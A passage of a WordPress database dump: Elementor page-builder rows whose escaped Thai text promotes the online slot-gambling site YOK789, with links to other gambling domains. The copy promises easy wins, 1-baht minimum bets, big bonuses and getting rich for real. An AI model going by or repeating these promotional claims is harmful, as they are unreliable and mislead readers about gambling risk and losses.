\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e15\\u0e34\\u0e21\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e1b\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c \\u0e08\\u0e30\\u0e25\\u0e2d\\u0e07\\u0e08\\u0e31\\u0e1a\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01 \\u0e14\\u0e39\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e17\\u0e2a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e42\\u0e1b\\u0e23 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e32\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e47\\u0e40\\u0e14\\u0e34\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e09\\u0e35\\u0e22\\u0e1a\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e44\\u0e14\\u0e49\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e17\\u0e38\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e23\\u0e01 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e08\\u0e32\\u0e01\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2389,328,'_thumbnail_id','273'),(2390,328,'_elementor_edit_mode','builder'),(2391,328,'_elementor_template_type','wp-page'),(2392,328,'_elementor_version','3.35.5'),(2393,328,'_elementor_pro_version','3.32.3'),(2394,328,'_wp_page_template','default'),(2395,328,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2396,328,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-Yok789.webp\",\"id\":274,\"size\":\"\",\"alt\":\"YOK789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-Yok789.webp\",\"id\":278,\"size\":\"\",\"alt\":\"Yok789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"https:\\/\\/amb18b.com\\/\\\"><b>YOK789<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e04\\u0e37\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e27\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e25\\u0e2d\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1b\\u0e23\\u0e01\\u0e47\\u0e44\\u0e25\\u0e48\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2a\\u0e1b\\u0e35\\u0e14 \\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e40\\u0e15\\u0e34\\u0e21\\u0e16\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27\\u0e17\\u0e31\\u0e19\\u0e43\\u0e08\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e36\\u0e01\\u0e04\\u0e31\\u0e01\\u0e1c\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e27\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2b\\u0e19\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e17\\u0e49\\u0e32\\u0e17\\u0e32\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e2a\\u0e19\\u0e43\\u0e08\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e31\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e35\\u0e41\\u0e04\\u0e48\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e42\\u0e04\\u0e15\\u0e23\\u0e44\\u0e27 \\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e17\\u0e35\\u0e48\\u0e17\\u0e38\\u0e01\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2b\\u0e19\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e41\\u0e25\\u0e30\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e16\\u0e39\\u0e01\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e04\\u0e2d\\u0e22\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e35\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e34\\u0e14\\u0e02\\u0e36\\u0e49\\u0e19 <\\/span><a href=\\\"https:\\/\\/luca333auto.com\\/\\\"><b>\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2a\\u0e21\\u0e48\\u0e33\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e08\\u0e33\\u0e40\\u0e08 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e44\\u0e23\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e2a\\u0e14\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e49\\u0e32\\u0e27\\u0e41\\u0e23\\u0e01\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e49\\u0e19\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e18\\u0e23\\u0e23\\u0e21\\u0e14\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><span style=\\\"color: #99cc00;\\\"><b>YOK789 <\\/b><\\/span><b><span style=\\\"color: #99cc00;\\\">\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21<\\/span> <\\/b><\\/li><\\/ul><p><b><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e22\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e27\\u0e35\\u0e22\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e48\\u0e27\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e21\\u0e35\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e01\\u0e15\\u0e34 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e35\\u0e04\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e1a\\u0e39\\u0e2a\\u0e15\\u0e4c\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e14\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e19\\u0e35\\u0e22\\u0e19 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 